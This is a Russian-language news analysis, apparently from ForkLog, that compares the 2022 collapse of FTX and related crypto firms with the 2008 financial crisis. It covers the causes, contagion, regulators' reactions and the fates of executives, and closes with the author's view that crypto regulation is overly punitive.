Жадность и безрассудство: почему крах FTX сравнивают с кризисом 2008 года

2022 год стал для криптовалютной индустрии нелегким испытанием — после краха Terra и последовавшим за этим банкротством ряда крупных компаний сообщество потряс коллапс бизнес-империи Сэма Бэнкмана-Фрида (SBF).

Практически сразу некоторые представители отрасли и власти провели параллели между FTX и кризисом 2008 года. ForkLog вспомнил, что предшествовало коллапсу на Уолл-стрит, как развивались события в 2008 и 2022 годах, а также сравнил реакцию регуляторов и последствия для непосредственных участников.

Катализатором событий 2008 года стал ипотечный кризис в США. Проблемы в финансовом секторе за короткое время превратились в снежный ком, который выкатился за пределы страны и в итоге накрыл мировые рынки. Но что привело к этому?

После Великой депрессии финансовая отрасль жестко регулировалась, однако в начале 80-х подход изменился. Этап смягчения начался с назначения председателя инвестиционного банка Merrill Lynch Дональда Ригана министром финансов и продолжился после прихода в 1987 году на пост главы ФРС Алана Гринспена.

Свою роль в дерегуляции сыграл бывший CEO Goldman Sachs Роберт Рубин. Будучи главой Минфина, он предложил снять все ограничения в работе коммерческих банков — они смогли не только оперировать вкладами и выдавать кредиты, но и совершать сделки от своего имени и имени клиентов.

Многие эксперты сходятся во мнении, что именно дерегулирование в итоге привело к глобальному экономическому коллапсу. Впоследствии газета The Guardian назвала Гринспена одним из «виновников» обвала 2008 года.

«[…] Уолл-стрит за счет своего влияния, лобби и огромных средств постепенно подчинил себе политическую систему — как демократическое, так и республиканское крыло», — отмечал профессор экономики и критик криптовалют Нуриэль Рубини в фильме «Инсайдеры» (2010 год).

Выводов о негативном влиянии дерегулирования сектора (в том числе отмены закона Гласса — Стиголла в 1999 году) и расширении аппетитов банков не последовало и после краха пузыря доткомов. В это время бурное развитие получил рынок деривативов. Согласно той же статье в The Guardian, Гринспен активно защищал производные финансовые инструменты, стимулировал выдачу высокорискованных ипотечных кредитов и побуждал домовладельцев переходить от фиксированных ставок по ипотеке к плавающим.

Интерес к ипотеке возрастал, а ослабление регулирования привело к появлению субстандартных кредитов. Это существенно повысило спрос и вызвало самоподдерживающийся рост цен на недвижимость. В итоге наметилась тенденция вывода на рынок более рискованных продуктов.

На чем зарабатывали финансовые учреждения:

Пузырь на рынке недвижимости США достиг наивысшей точки в 2005-2006 годах. С середины 2006 года цены на дома начали падать, а плавающая процентная ставка после истечения льготных условий и на фоне ужесточения политики ФРС — повышаться. Людям стало сложнее погашать долги и добиваться рефинансирования, что привело к резкому скачку случаев невыполнения обязательств.

Банки стали выселять заемщиков из домов, выставляя последние на продажу, что усилило негативные тенденции.

Снежный ком неминуемо накрыл банки — в марте 2008 года потерпел крушение Bear Stearns. Его выкупил JPMorgan Chase за $236,2 млн (по $2 за акцию). ФРС поддержала сделку, гарантировав вливание экстренного финансирования.

В сентябре крупнейшие финансовые учреждения — Fannie Mae и Freddie Mac, держатели частных ипотечных долгов на $14 трлн, — выкупило государство. Оно же выделило помощь AIG, которая оказалась не в состоянии выполнить обязательства по всем страховым выплатам.

Следующим оказался Lehman Brothers с долгом в более чем $600 млрд, который власти отказались «спасать». На очереди был Merrill Lynch, однако ему удалось избежать банкротства благодаря Bank of America.

За помощью к государству обратились компании General Motors, Chrysler и другие. «Заражение» охватило не только американский, но и мировой рынок.

В рамках предвыборной кампании на пост президента США Барак Обама назвал причинами кризиса жадность Уолл-стрит и ошибки регулирования. Став главой государства, в 2009 году он призвал извлечь урок из банкротства Lehman Brothers и поддержать реформу финансового регулирования.

В частности, ответами на кризис в США стали:

Антикризисные меры позволили улучшить экономическое положение в стране, но привели к огромным бюджетным расходам и подъему госдолга США. В результате растущего недовольства мерами правительства, в том числе по отношению к участникам банковской сферы, в сентябре 2011 года Уолл-стрит охватил длительный протест Occupy Wall Street.

Обвал фондового рынка в октябре 2008 года стал рекордным для рынка США за предыдущие 20 лет. Жесткому воздействию подверглись экономики Европы и Азии.

Кризис спровоцировал:

Эксперты МВФ в своем исследовании от 2018 года отметили, что за десять лет большинство стран так и не сумели достичь объемов производства, наблюдавшихся до экономического коллапса.

«Финансовый кризис 2008 года уходит корнями в предшествовавшую ему пятилетку ипотечного бума в США. Его последствия проявились по всему миру — от закрытых сборочных производств в Мексике до реструктуризации региональных сбережений и сберегательных касс в Испании и затянувшейся безработицы среди мигрантов в дельте Жемчужной реки на юге Китая», — говорится в отчете.

Вскоре после коллапса AIG американские власти начали расследование в отношении страховой компании. Однако в 2010 году Минюст, а после и Комиссия по ценным бумагам и биржам США (SEC) отказались предъявлять какие-либо обвинения экс-главе AIG Financial Products Джозефу Кассано.

Убытки его подразделения, занимавшегося дефолтными свопами, составили $11 млрд, что стало причиной увольнения. Однако он получил не только многомиллионные выплаты, но и новый контракт — AIG наняла Кассано на должность консультанта с зарплатой $1 млн в месяц.

Занимавший пост CEO Merrill Lynch Стэн О`Нил ушел в отставку в 2007 году, когда компания уже нуждалась в «спасении». Он взял на себя ответственность за то, что объем списанных средств банка составил в третьем квартале 2007 года $7,9 млрд, уточнив, что неправильно оценил ситуацию с высокорисковыми ипотечными кредитами.

Согласно статье WSJ, созданная в 2009 году Комиссия по расследованию финансового кризиса заподозрила О’Нила в нарушении закона о ценных бумагах и введении инвесторов в заблуждение. Группу распустили спустя два года, а против экс-главы Merrill Lynch так и не выдвинули никаких обвинений. Он покинул компанию с выходным пособием в размере $161,5 млн, включая акции и опционы.

Глава некогда крупнейшего поставщика ипотечных кредитов в США Countrywide Financial Анджело Мозило добровольно отказался от выходного пособия в размере $37,5 млн, а также гонорара за консультации ($400 000). Однако за ним сохранились различные пенсионные выплаты и заработанные компенсации на сумму около $44 млн.

SEC предъявила Мозило обвинения в мошенничестве с ценными бумагами и инсайдерской торговле. В 2010 году стороны пришли к соглашению, по которому экс-глава Countrywide Financial согласился выплатить $67,5 млн.

Согласно Fortune, Ричард Сайрон ушел с поста генерального директора Freddie Mac с $3,8 млн, бывший председатель и главный исполнительный директор Citigroup Чарльз Принс получил $41,9 млн. Однако самому банку в итоге пришлось отдать $7 млрд в рамках урегулирования федерального расследования.

Активные сторонники дерегулирования финансового сектора и высокорисковых ипотечных займов, в числе которых был Гринспен, не понесли наказания. Они выступали перед комиссиями и Конгрессом, однако с действительно реальными проблемами не столкнулись.

Как и в случае с кризисом 2008 года, коллапс бизнес-империи Сэма Бэнкмана-Фрида стал итогом более ранних событий, последовательно «заражающих» связанных друг с другом игроков.

Главной проблемой FTX стала ее тесная связь с Alameda Research. Биржа в сотрудничестве с торговой фирмой выпустила и контролировала большую часть utility-токенов FTT (280 млн из первоначальной эмиссии в 350 млн). Alameda также выступала в качестве одного из первых поставщиков ликвидности для FTX в мае 2019 года.

Низкая доля FTT на рынке позволяла влиять на цену токена. Ее рост во время бычьего ралли 2021 года (с $0,1 до $84) дал Alameda возможность применять монеты как обеспечение для заимствований. К примеру, в сентябре того же года торговая фирма таким образом использовала FTT стоимостью $1,6 млрд в сделке с Genesis Global Capital.

Уже после событий ноября 2022 года экс-глава Alameda Research Кэролайн Эллисон на суде заявила, что знала о доступе фирмы к займам на FTX. По ее словам, вместе с SBF она решила скрыть такое соглашение от кредиторов и подделать для этого финансовые отчеты.

«Этот механизм позволил Alameda получить доступ к безлимитной кредитной линии без необходимости предоставления залога», — пояснила она.

Стройная схема дала сбой в начале мая 2022 года, когда рынок потряс коллапс Terra. Он «заразил» ряд криптокомпаний, в числе которых оказались хедж-фонд Three Arrows Capital (3AC) и лендинговая платформа Celsius.

Поскольку они имели отношение к Genesis Global Capital, Alameda, по предположениям Nansen, столкнулась с делевериджем и кризисом ликвидности. Впоследствии стало известно, что FTX оказала «крупную финансовую помощь» родственной фирме.

Это позволило SBF скрывать растущие в компании проблемы вплоть до ноября и даже заявлять о наличии значительных сумм на поддержку пострадавших участников индустрии.

Эффект разорвавшейся бомбы произвело решение CEO Binance Чанпэна Чжао избавиться от FTT в свете «недавних разоблачений». Предположительно, он имел в виду расследование CoinDesk, в котором раскрывались подробности баланса Alameda Research.

8 ноября котировки FTT упали почти на 30% на фоне опасений касательно финансовой устойчивости платформы. Уже 11 ноября FTX Group подала заявление о несостоятельности, а Бэнкман-Фрид покинул пост CEO.

С этого момента сообщество наблюдало, как охвативший FTX и Alameda Research кризис накрывает и других игроков: BlockFi, Core Scientific, Genesis Global Capital.

В отличие от 2008 года компаниям из криптовалютной отрасли не приходилось рассчитывать на государственную помощь. Напротив, индустрия столкнулась с усилением критики.

Отсутствие должного регулирования, по мнению ряда политиков и участников криптовалютного сообщества, также стало причиной коллапса 2022 года. В ноябре член банковского комитета Сената США Элизабет Уоррен не только сравнила цифровые активы с субстандартными ипотечными займами, но призвала федеральные агентства «жестко бороться с криптомошенничеством».

О необходимости более строгого контроля заявил и сторонник биткоина, бывший глава MicroStrategy Майкл Сэйлор. Он раскритиковал Бэнкмана-Фрида за выпуск незарегистрированных ценных бумаг, которые помогли ему заработать миллиарды на «напечатанных из воздуха» токенах, и признал — регулирование отрасли является необходимым элементом ее роста.

Член Палаты представителей США Том Эммер обрушился с претензиями на председателя SEC Гэри Генслера. По его мнению, крах FTX — провал регулирования индустрии, при том, что ведомство должно было в принципе контролировать такие проекты, как Celsius Network, Terra и Voyager Digital.

В декабре 2022 года члены Комитета Сената США по сельскому хозяйству (курирует торговлю деривативами) и глава CFTC Ростин Бенам пришли к выводу, что работавшие десятилетиями правила Комиссии оказались недостаточными в контексте FTX.

При этом главная сторонница криптовалют в SEC Хестер Пирс указала, что виновные в проблемах отрасли цифровых активов не сделали ничего нового:

«Многие неудачи 2022 года были связаны с тем, что участники крипторынка совершали те же глупые и мошеннические поступки, которые игроки других рынков совершали на протяжении веков».

В итоге администрация президента США Джо Байдена призвала Конгресс «активизировать усилия» по части надзора над индустрией цифровых активов. В свою очередь, глава SEC включил регулирование криптовалют в список главных приоритетов Комиссии на 2023 год.

Однако первый шаг в этом направлении был не в сторону пошатнувших крипторынок платформ и проектов. Вместо того, чтобы разбираться с той же FTX, ведомство Генслера сделало неожиданный для всех выпад в сторону биткоин-биржи Kraken и ее программы стейкинга.

Действия Комиссии вызвали шквал критики, а Пирс назвала процесс против Kraken примером принудительного регулирования в сфере цифровых активов.

Неблагоприятные события в криптоиндустрии имели менее катастрофичный сценарий из-за отсутствия прямой связи с традиционной экономикой. Однако в масштабах экосистемы 2022 год стал крайне тяжелым для участников рынка и связанных с ними игроков из TradFi.

Одним из первых параллель с событиями 2008 года провел сооснователь и CEO Circle Джереми Аллэйр. Он сравнил неплатежеспособность FTX с коллапсом Lehman Brothers и заметил, что созданная в ответ на крах инвестбанка технология «породила свою копию».

В ноябре эксперты Crypto Fund Research предположили, что убытки криптовалютных фондов из-за банкротства биржи Бэнкмана-Фрида могут составить до $5 млрд. На тот момент аналитики допустили, что кризис затронул 25-40% отраслевых инвестиционных структур, вложивших средства в платформу или FTT.

Согласно материалам для суда, обязательства FTX и связанных с ней организаций перед 50 крупнейшими кредиторами достигли $3,1 млрд. Один из них имел требования на $226 млн.

Из поданного в январе 2023 года детального списка кредиторов следует, что обанкротившаяся биржа оказалась должником:

Криптокризис обнажил глубокие проблемы с прозрачностью платформ, которые не до конца раскрывают реальный объем резервов и их состав. Еще до того, как этот вывод превратился бы в оружие против индустрии, глава Binance выступил с инициативой Proof-of-Reserves.

Ряд экспертов подверг сомнению эффективность подобных проверок, отметив, что показатели не свидетельствуют о безопасности активов пользователей. Однако это не помешало некоторым биржам — OKX, Gate.io и Huobi — и дальше публиковать отчеты.

Неблагоприятные условия на рынке стали катализатором массовых увольнений. По данным CoinGecko, только за январь 2023 года криптокомпании сократили 41% от общего числа уволенных за весь 2022 год. По числу оставшихся без работы сотрудников аналитики особенно отметили июнь (3003), ноябрь (1805) и декабрь (649) 2022 года.

После краха экосистемы Terra финансовые регуляторы Южной Кореи провели экстренное заседание для оценки последствий инцидента. В дальнейшем власти выдали ордер на арест CEO Terraform Labs (TFL) До Квона и еще пятерых сотрудников по обвинениям, включающим нарушения законодательства о рынках капитала.

Квон назвал предъявленные претензии «политически мотивированными». 16 февраля 2022 года SEC обвинила его в организации многомиллиардного мошенничества с ценными бумагами.

На момент написания Квон по-прежнему скрывается от властей.

По некоторым данным, банкротство 3AC привлекло внимание CFTC и SEC — хедж-фонд якобы вводил инвесторов в заблуждение и не имел должной регистрации. Основатели Three Arrows Capital Су Чжу и Кайл Дэвис объяснили крах собственной чрезмерной самоуверенностью.

Однако провал с 3AC не помешал им переключиться на новый проект. В феврале 2023 года Чжу анонсировал открытие платформы OPNX для торговли правами требования и деривативами на них. В числе потенциальных пользователей создатели биржи видят клиентов FTX, Voyager, Celsius, Genesis, BlockFi и других, кто «отчаянно ищет решение».

После коллапса криптолендинговой платформы Celsius Network ее CEO Алекс Машинский покинул пост. В январе 2023 года офис генерального прокурора штата Нью-Йорк подал на него в суд за обман инвесторов «на миллиарды долларов». До этого Управление попечителей США заявило о «многочисленных вопросах» к руководству фирмы.

На текущий момент хуже всего пришлось Бэнкману-Фриду — на его арест властям потребовался месяц с момента подачи FTX заявления о несостоятельности. Основателя биржи экстрадировали в США, где суд согласился на освобождение под залог в $250 млн.

Американская прокуратура предъявила SBF обвинения в восьми уголовных преступлениях — ни по одному из них экс-глава FTX не признал вину. Гражданские иски также предъявили SEC и CFTC. Их рассмотрение отложено до завершения дела, инициированного Минюстом.

В феврале 2023 года основателя биржи обвинили в сговоре с целью банковского мошенничества. Количество инкриминируемых ему преступлений возросло до 12.

Бывшая глава Alameda Research Кэролайн Эллисон и соучредитель FTX Гэри Ван признали свою вину по обвинениям, связанным с крахом бизнес-империи Бэнкмана-Фрида, и согласились сотрудничать со следствием.

Проводя параллели между 2008 и 2022 годами, можно отметить схожие черты — отсутствие должного надзора, игнорирование очевидных рисков и «заражение» по цепочке. Однако есть и существенные отличия.

Оперативное введение регулирования для контроля за банковским сектором и в целом мягкие последствия для непосредственных участников контрастируют с правоприменительным подходом в отношении криптоиндустрии, хотя масштабы коллапса 2008 года в разы превышают охватившие ее проблемы.

Важно и то, что в первом случае жертвами стали обычные люди, которые не осознавали риски и поддавались заверениям не только банков, но и правительственных чиновников. Во втором же инвесторы могли предполагать, что им грозит.

В отличие от краха 2008 года, зачинщики которого в целом избежали наказания, в криптокризисе уже нашли главного злодея. Судя по развитию событий, дело Бэнкмана-Фрида может стать показательным.

Все вышесказанное не оправдывает экс-главу FTX, топ-менеджмент TFL, Celsius Network и Three Arrows Capital. Однако показывает, что сейчас регуляторы руководствуются больше своим стремлением подчинить криптовалютную отрасль, отказываясь от диалога, чем желанием защитить потребителей.
